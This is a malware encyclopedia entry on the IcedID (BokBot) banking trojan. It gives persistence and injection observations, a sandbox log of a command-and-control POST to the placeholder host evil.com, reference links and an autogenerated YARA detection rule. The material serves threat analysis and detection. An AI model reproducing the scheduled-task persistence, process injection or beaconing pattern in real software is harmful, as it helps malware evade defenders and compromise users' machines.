win.icedid (Back to overview)

IcedID

aka: BokBot

Actor(s): Lunar Spider

URLhaus        

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References
http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/
https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/
https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html
https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites
https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/
https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/
https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/
https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/
https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/
https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/
https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid
https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html
https://www.youtube.com/watch?v=7Dk7NkIbVqY
https://www.youtube.com/watch?v=wObF9n2UIAM
Yara Rules
[TLP:WHITE] win_icedid_auto (20180607 | autogenerated rule brought to you by yara-signator)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2018-11-23"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator 0.1a"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_version = "20180607"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using yara-signator.
     * The code and documentation / approach will be published in the near future here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */

    strings:
        $sequence_0 = { 53 8bde 8a03 0fb6c8 }
            // n = 4, score = 4000
            //   53                   | push                ebx
            //   8bde                 | mov                 ebx, esi
            //   8a03                 | mov                 al, byte ptr [ebx]
            //   0fb6c8               | movzx               ecx, al

        $sequence_1 = { 834e08ff eb1b 80f930 7c05 }
            // n = 4, score = 4000
            //   834e08ff             | or                  dword ptr [esi + 8], 0xffffffff
            //   eb1b                 | jmp                 0x4074e8
            //   80f930               | cmp                 cl, 0x30
            //   7c05                 | jl                  0x4074d7

        $sequence_2 = { 83ffff 7504 33c0 eb5f }
            // n = 4, score = 4000
            //   83ffff               | cmp                 edi, 0xff
            //   7504                 | jne                 0x40cc4d
            //   33c0                 | xor                 eax, eax
            //   eb5f                 | jmp                 0x40ccac

        $sequence_3 = { 53 8b5c2430 57 f6c102 }
            // n = 4, score = 4000
            //   53                   | push                ebx
            //   8b5c2430             | mov                 ebx, dword ptr [esp + 0x30]
            //   57                   | push                edi
            //   f6c102               | test                cl, 2

        $sequence_4 = { 89542430 895c242c 895c241c 89542418 }
            // n = 4, score = 4000
            //   89542430             | mov                 dword ptr [esp + 0x30], edx
            //   895c242c             | mov                 dword ptr [esp + 0x2c], ebx
            //   895c241c             | mov                 dword ptr [esp + 0x1c], ebx
            //   89542418             | mov                 dword ptr [esp + 0x18], edx

        $sequence_5 = { 83c8ff f00fc107 48 7559 }
            // n = 4, score = 4000
            //   83c8ff               | or                  eax, 0xffffffff
            //   f00fc107             | lock xadd           dword ptr [edi], eax
            //   48                   | dec                 eax
            //   7559                 | jne                 0x40a5ff

        $sequence_6 = { 7418 33c9 41 eb0b }
            // n = 4, score = 4000
            //   7418                 | je                  0x406673
            //   33c9                 | xor                 ecx, ecx
            //   41                   | inc                 ecx
            //   eb0b                 | jmp                 0x40666b

        $sequence_7 = { 803e00 7427 6a3b 56 }
            // n = 4, score = 4000
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x404117
            //   6a3b                 | push                0x3b
            //   56                   | push                esi

        $sequence_8 = { 85db 7411 8a0432 02c4 }
            // n = 4, score = 4000
            //   85db                 | test                ebx, ebx
            //   7411                 | je                  0x4041f9
            //   8a0432               | mov                 al, byte ptr [edx + esi]
            //   02c4                 | add                 al, ah

        $sequence_9 = { 85c0 7410 ff763c ff742418 }
            // n = 4, score = 4000
            //   85c0                 | test                eax, eax
            //   7410                 | je                  0x40c3fa
            //   ff763c               | push                dword ptr [esi + 0x3c]
            //   ff742418             | push                dword ptr [esp + 0x18]

    condition:
        7 of them
}
Download all Yara Rules